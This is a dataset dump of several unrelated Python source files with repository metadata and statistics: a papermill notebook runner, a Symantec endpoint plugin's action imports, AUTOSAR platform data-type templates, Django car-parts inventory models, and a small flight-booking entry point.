b96e505f72d7f61492fd2faeca0d4ba389a463ef
|
[
"BSD-3-Clause"
] | null | null | null |
notebook_tester.py
|
jessmuir/DESI-HighSchool
|
b96e505f72d7f61492fd2faeca0d4ba389a463ef
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import papermill as pm
pm.execute_notebook(
'./Intro.ipynb',
'./pmout/pmout.ipynb',
parameters=dict(alpha=0.6, ratio=0.1)
)
pm.execute_notebook(
'./DESI.ipynb',
'./pmout/pmout.ipynb',
parameters=dict(alpha=0.6, ratio=0.1)
)
pm.execute_notebook(
'./DesigningDESI.ipynb',
'./pmout/pmout.ipynb',
parameters=dict(alpha=0.6, ratio=0.1)
)
pm.execute_notebook(
'./SnowWhiteDwarf.ipynb',
'./pmout/pmout.ipynb',
parameters=dict(alpha=0.6, ratio=0.1)
)
| 18.259259
| 40
| 0.663286
| 70
| 493
| 4.614286
| 0.285714
| 0.111455
| 0.210526
| 0.247678
| 0.752322
| 0.752322
| 0.752322
| 0.752322
| 0.752322
| 0.752322
| 0
| 0.037825
| 0.141988
| 493
| 26
| 41
| 18.961538
| 0.725768
| 0
| 0
| 0.545455
| 0
| 0
| 0.292089
| 0.087221
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.090909
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3306ddf46d862c7a67e0d6c49cb61d4747afae81
| 176
|
py
|
Python
|
plugins/broadcom_symantec_endpoint_protection/icon_broadcom_symantec_endpoint_protection/actions/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 46
|
2019-06-05T20:47:58.000Z
|
2022-03-29T10:18:01.000Z
|
plugins/broadcom_symantec_endpoint_protection/icon_broadcom_symantec_endpoint_protection/actions/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 386
|
2019-06-07T20:20:39.000Z
|
2022-03-30T17:35:01.000Z
|
plugins/broadcom_symantec_endpoint_protection/icon_broadcom_symantec_endpoint_protection/actions/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 43
|
2019-07-09T14:13:58.000Z
|
2022-03-28T12:04:46.000Z
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
from .blacklist.action import Blacklist
from .get_agent_details.action import GetAgentDetails
from .quarantine.action import Quarantine
| 35.2
| 53
| 0.835227
| 24
| 176
| 6.041667
| 0.666667
| 0.248276
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119318
| 176
| 4
| 54
| 44
| 0.935484
| 0.210227
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
333fe37decd0ba8919969dc7a9f6329fe28062d8
| 19,753
|
py
|
Python
|
examples/autosar4/template/packages/platform.py
|
SHolzmann/autosar
|
26a7725ef71f63323ba5daa8d8bd841449da1da4
|
[
"MIT"
] | 199
|
2016-07-27T17:14:43.000Z
|
2022-03-30T12:28:02.000Z
|
examples/autosar4/template/packages/platform.py
|
SHolzmann/autosar
|
26a7725ef71f63323ba5daa8d8bd841449da1da4
|
[
"MIT"
] | 50
|
2017-10-10T08:19:21.000Z
|
2022-03-27T18:43:29.000Z
|
examples/autosar4/template/packages/platform.py
|
SHolzmann/autosar
|
26a7725ef71f63323ba5daa8d8bd841449da1da4
|
[
"MIT"
] | 125
|
2016-07-27T17:16:08.000Z
|
2022-03-30T17:03:28.000Z
|
#!/usr/bin/env python3
import autosar
enable_64_bit_types = True
class AUTOSAR_Platform(autosar.Template):
"""AUTOSAR Platform Package"""
@classmethod
def ref(cls): return '/AUTOSAR_Platform'
@classmethod
def apply(cls, ws):
package = ws.find('/AUTOSAR_Platform')
if package is None:
package = ws.createPackage('AUTOSAR_Platform')
package.createSubPackage('BaseTypes')
package.createSubPackage('CompuMethods')
package.createSubPackage('DataConstrs')
package.createSubPackage('ImplementationDataTypes')
class all(autosar.Template):
"""
Applies all known platform templates at once
"""
@classmethod
def apply(self, ws):
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.dtRef_const_VOID)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.dtRef_VOID)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.boolean)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.float32)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.float64)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.sint8)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.sint16)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.sint32)
if enable_64_bit_types:
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.sint64)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.uint8)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.uint16)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.uint32)
if enable_64_bit_types:
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.uint64)
# ws.apply(AUTOSAR_Platform.BaseTypes.boolean)
# ws.apply(AUTOSAR_Platform.BaseTypes.dtRef_const_VOID)
# ws.apply(AUTOSAR_Platform.BaseTypes.dtRef_VOID)
# ws.apply(AUTOSAR_Platform.BaseTypes.sint16)
# ws.apply(AUTOSAR_Platform.BaseTypes.sint8)
# ws.apply(AUTOSAR_Platform.BaseTypes.uint8)
# ws.apply(AUTOSAR_Platform.BaseTypes.uint16)
# ws.apply(AUTOSAR_Platform.BaseTypes.uint32)
# ws.apply(AUTOSAR_Platform.BaseTypes.float32)
# ws.apply(AUTOSAR_Platform.BaseTypes.float64)
# ws.apply(AUTOSAR_Platform.ImplementationDataTypes.boolean)
# ws.apply(AUTOSAR_Platform.ImplementationDataTypes.sint16)
# ws.apply(AUTOSAR_Platform.ImplementationDataTypes.sint8)
# ws.apply(AUTOSAR_Platform.ImplementationDataTypes.uint16)
# ws.apply(AUTOSAR_Platform.ImplementationDataTypes.uint32)
# ws.apply(AUTOSAR_Platform.ImplementationDataTypes.float32)
class BaseTypes:
@classmethod
def ref(cls): return '/AUTOSAR_Platform/BaseTypes'
class dtRef_const_VOID(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 1, encoding = 'VOID', nativeDeclaration = 'void')
class dtRef_VOID(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 1, encoding = 'VOID', nativeDeclaration = 'void')
class boolean(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 8, encoding = 'BOOLEAN', nativeDeclaration='boolean')
class float32(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 32, encoding = 'IEEE754', nativeDeclaration = cls.__name__)
class float64(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 64, encoding = 'IEEE754', nativeDeclaration = cls.__name__)
class sint8(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 8, encoding = '2C', nativeDeclaration = cls.__name__)
class sint16(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 16, encoding = '2C', nativeDeclaration = cls.__name__)
class sint32(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 32, encoding = '2C', nativeDeclaration = cls.__name__)
class sint64(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 64, encoding = '2C', nativeDeclaration = cls.__name__)
class uint8(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 8, nativeDeclaration = cls.__name__)
class uint16(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 16, nativeDeclaration = cls.__name__)
class uint32(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 32, nativeDeclaration = cls.__name__)
class uint64(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 64, nativeDeclaration = cls.__name__)
class ImplementationDataTypes:
@classmethod
def ref(cls): return '/AUTOSAR_Platform/ImplementationDataTypes'
class dtRef_const_VOID(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.dtRef_const_VOID)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
package.createImplementationDataTypePtr(cls.__name__, AUTOSAR_Platform.BaseTypes.dtRef_const_VOID.ref(), swImplPolicy = 'CONST')
class dtRef_VOID(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.dtRef_VOID)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
package.createImplementationDataTypePtr(cls.__name__, AUTOSAR_Platform.BaseTypes.dtRef_VOID.ref())
class boolean(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.boolean)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.boolean.ref(), valueTable=['FALSE', 'TRUE'], typeEmitter='Platform_Type')
ws.popRoles()
class float32(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.float32)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.float32.ref(), lowerLimit="-INF", lowerLimitType="OPEN", upperLimit="INF", upperLimitType="OPEN", typeEmitter='Platform_Type')
ws.popRoles()
class float64(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.float64)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.float64.ref(), lowerLimit="-INF", lowerLimitType="OPEN", upperLimit="INF", upperLimitType="OPEN", typeEmitter='Platform_Type')
ws.popRoles()
class sint8(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.sint8)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.sint8.ref(), lowerLimit=-128, upperLimit=127, typeEmitter='Platform_Type')
ws.popRoles()
class sint16(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.sint16)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.sint16.ref(), lowerLimit=-32768, upperLimit=32767, typeEmitter='Platform_Type')
ws.popRoles()
class sint32(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.sint32)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.sint32.ref(), lowerLimit=-2147483648, upperLimit=2147483647, typeEmitter='Platform_Type')
ws.popRoles()
class sint64(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.sint64)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.sint64.ref(), lowerLimit=-9223372036854775808, upperLimit=9223372036854775807, typeEmitter='Platform_Type')
ws.popRoles()
class uint8(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.uint8)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.uint8.ref(), lowerLimit=0, upperLimit=255, typeEmitter='Platform_Type')
ws.popRoles()
class uint16(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.uint16)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.uint16.ref(), lowerLimit=0, upperLimit=65535, typeEmitter='Platform_Type')
ws.popRoles()
class uint32(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.uint32)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.uint32.ref(), lowerLimit=0, upperLimit=4294967295, typeEmitter='Platform_Type')
ws.popRoles()
class uint64(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.uint64)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.uint64.ref(), lowerLimit=0, upperLimit=18446744073709551615, typeEmitter='Platform_Type')
ws.popRoles()
if __name__ == '__main__':
ws = autosar.workspace("4.2.2")
ws.apply(AUTOSAR_Platform.all)
autosar.util.createDcf(ws).save('autosar4', 'Platform', {
'AUTOSAR_Platform': {'root': 'DATATYPE', 'filters': ['/AUTOSAR_Platform']}
}, force=True)
| 48.295844
| 224
| 0.617375
| 1,815
| 19,753
| 6.416529
| 0.058402
| 0.195775
| 0.12983
| 0.105787
| 0.900223
| 0.884252
| 0.803881
| 0.793835
| 0.779753
| 0.779753
| 0
| 0.018872
| 0.278388
| 19,753
| 408
| 225
| 48.414216
| 0.798162
| 0.04531
| 0
| 0.765273
| 0
| 0
| 0.076702
| 0.039335
| 0
| 0
| 0
| 0
| 0
| 1
| 0.18328
| false
| 0
| 0.003215
| 0.093248
| 0.282958
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3357b6239d616ac5d16830dadf9568ee59c7e9ca
| 7,966
|
py
|
Python
|
inventories/models.py
|
maziokey/mechanic
|
140079101125ece44d107bd826ee70da5ac46041
|
[
"MIT"
] | 1
|
2020-08-29T18:35:24.000Z
|
2020-08-29T18:35:24.000Z
|
inventories/models.py
|
maziokey/mechanic
|
140079101125ece44d107bd826ee70da5ac46041
|
[
"MIT"
] | null | null | null |
inventories/models.py
|
maziokey/mechanic
|
140079101125ece44d107bd826ee70da5ac46041
|
[
"MIT"
] | null | null | null |
import uuid
import datetime
from django.core.validators import MaxValueValidator, MinValueValidator
from django.db import models
from django.urls import reverse
from django.utils.text import slugify
# Create your models here.
def current_year():
return datetime.date.today().year
def max_value_current_year(value):
return MaxValueValidator(current_year())(value)
class Make(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
name = models.CharField(max_length=40)
slug = models.SlugField(default='', editable=False, max_length=200, null=False)
def __str__(self):
return self.name
def get_absolute_url(self):
kwargs = {
'pk': self.id,
'slug': self.slug
}
return reverse('make_detail', kwargs=kwargs)
def save(self, *args, **kwargs):
value = self.name
self.slug = slugify(value, allow_unicode=True)
super().save(*args, **kwargs)
class Car_Model(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
make = models.ForeignKey(Make, related_name='carmodels', on_delete=models.CASCADE)
name = models.CharField(max_length=40)
slug = models.SlugField(default='', editable=False, max_length=200, null=False)
def __str__(self):
return self.name
def get_absolute_url(self):
kwargs = {
'pk': self.id,
'slug': self.slug
}
return reverse('car_model_detail', kwargs=kwargs)
def save(self, *args, **kwargs):
value = self.name
self.slug = slugify(value, allow_unicode=True)
super().save(*args, **kwargs)
class Model_Year(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
make = models.ForeignKey(Make, related_name='carmodelyears', on_delete=models.CASCADE)
car_model = models.ForeignKey(Car_Model, related_name='modelyears', on_delete=models.CASCADE)
prod_year = models.PositiveIntegerField(default=current_year(), validators=[MinValueValidator(1984), max_value_current_year])
slug = models.SlugField(default='', editable=False, max_length=200, null=False)
def __str__(self):
return str(self.prod_year)
def get_absolute_url(self):
kwargs = {
'pk': self.id,
'slug': self.slug
}
return reverse('model_year_detail', kwargs=kwargs)
def save(self, *args, **kwargs):
value = self.prod_year
self.slug = slugify(value, allow_unicode=True)
super().save(*args, **kwargs)
class Engine(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
make = models.ForeignKey(Make, related_name='carengines', on_delete=models.CASCADE)
car_model = models.ForeignKey(Car_Model, related_name='carmodelengines', on_delete=models.CASCADE)
model_year = models.ForeignKey(Model_Year, related_name='engines', on_delete=models.CASCADE)
name = models.CharField(max_length=40)
slug = models.SlugField(default='', editable=False, max_length=200, null=False)
def __str__(self):
return self.name
def get_absolute_url(self):
kwargs = {
'pk': self.id,
'slug': self.slug
}
return reverse('engine_detail', kwargs=kwargs)
def save(self, *args, **kwargs):
value = self.name
self.slug = slugify(value, allow_unicode=True)
super().save(*args, **kwargs)
class Fuel(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
make = models.ForeignKey(Make, related_name='carfuels', on_delete=models.CASCADE)
car_model = models.ForeignKey(Car_Model, related_name='carmodelfuels', on_delete=models.CASCADE)
model_year = models.ForeignKey(Model_Year, related_name='yearfuels', on_delete=models.CASCADE)
engine = models.ForeignKey(Engine, related_name='fuels', on_delete=models.CASCADE)
name = models.CharField(max_length=40)
slug = models.SlugField(default='', editable=False, max_length=200, null=False)
def __str__(self):
return self.name
def get_absolute_url(self):
kwargs = {
'pk': self.id,
'slug': self.slug
}
return reverse('fuel_detail', kwargs=kwargs)
def save(self, *args, **kwargs):
value = self.name
self.slug = slugify(value, allow_unicode=True)
super().save(*args, **kwargs)
class Component(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
make = models.ForeignKey(Make, related_name='carcomponents', on_delete=models.CASCADE)
car_model = models.ForeignKey(Car_Model, related_name='carmodelcomponents', on_delete=models.CASCADE)
model_year = models.ForeignKey(Model_Year, related_name='yearcomponents', on_delete=models.CASCADE)
engine = models.ForeignKey(Engine, related_name='enginecomponents', on_delete=models.CASCADE)
fuel = models.ForeignKey(Fuel, related_name='fuelcomponents', on_delete=models.CASCADE)
name = models.CharField(max_length=40)
slug = models.SlugField(default='', editable=False, max_length=200, null=False)
def __str__(self):
return self.name
def get_absolute_url(self):
kwargs = {
'pk': self.id,
'slug': self.slug
}
return reverse('component_detail', kwargs=kwargs)
def save(self, *args, **kwargs):
value = self.name
self.slug = slugify(value, allow_unicode=True)
super().save(*args, **kwargs)
class Part(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
make = models.ForeignKey(Make, related_name='makeparts', on_delete=models.CASCADE)
car_model = models.ForeignKey(Car_Model, related_name='carmodelparts', on_delete=models.CASCADE)
model_year = models.ForeignKey(Model_Year, related_name='yearparts', on_delete=models.CASCADE)
engine = models.ForeignKey(Engine, related_name='engineparts', on_delete=models.CASCADE)
fuel = models.ForeignKey(Fuel, related_name='fuelparts', on_delete=models.CASCADE)
component = models.ForeignKey(Component, related_name='componentparts', on_delete=models.CASCADE)
name = models.CharField(max_length=40, db_index=True)
description = models.TextField(blank=True)
specification = models.TextField(blank=True)
stock = models.BooleanField(default=True)
price = models.DecimalField(max_digits=10, decimal_places=2)
image = models.ImageField(upload_to='pics/', blank=True)
slug = models.SlugField(default='', editable=False, max_length=200, null=False)
def __str__(self):
return self.name
def get_absolute_url(self):
kwargs = {
'pk': self.id,
'slug': self.slug
}
return reverse('part_detail', kwargs=kwargs)
def save(self, *args, **kwargs):
value = self.name
self.slug = slugify(value, allow_unicode=True)
super().save(*args, **kwargs)
'''
class Car(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
name = models.CharField(max_length=30, db_index=True)
model = models.CharField(max_length=30)
year = models.PositiveIntegerField(default=current_year(), validators=[MinValueValidator(1984), max_value_current_year])
engine = models.CharField(max_length=20)
fuel = models.CharField(max_length=20)
slug = models.SlugField(default='', editable=False, max_length=200, null=False)
def __str__(self):
return self.name
def get_absolute_url(self):
kwargs = {
'pk': self.id,
'slug': self.slug
}
return reverse('car_detail', kwargs=kwargs)
def save(self, *args, **kwargs):
value = self.name
self.slug = slugify(value, allow_unicode=True)
super().save(*args, **kwargs)
'''
| 38.483092
| 129
| 0.681898
| 983
| 7,966
| 5.347915
| 0.116989
| 0.063915
| 0.055925
| 0.083888
| 0.815294
| 0.800076
| 0.800076
| 0.800076
| 0.800076
| 0.800076
| 0
| 0.009802
| 0.193196
| 7,966
| 207
| 130
| 38.483092
| 0.808153
| 0.003013
| 0
| 0.587838
| 0
| 0
| 0.054027
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.155405
| false
| 0
| 0.040541
| 0.060811
| 0.668919
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
cc046cb8a29b3347d94897779b1c5bbd9afe9506
| 68
|
py
|
Python
|
book_flight/__init__.py
|
hoou/book-flight
|
8ddf30c62e59af8219d02837fb1a21229fb0f908
|
[
"MIT"
] | null | null | null |
book_flight/__init__.py
|
hoou/book-flight
|
8ddf30c62e59af8219d02837fb1a21229fb0f908
|
[
"MIT"
] | null | null | null |
book_flight/__init__.py
|
hoou/book-flight
|
8ddf30c62e59af8219d02837fb1a21229fb0f908
|
[
"MIT"
] | null | null | null |
import book_flight.book_flight
def main():
book_flight.main()
| 11.333333
| 30
| 0.735294
| 10
| 68
| 4.7
| 0.5
| 0.638298
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161765
| 68
| 5
| 31
| 13.6
| 0.824561
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
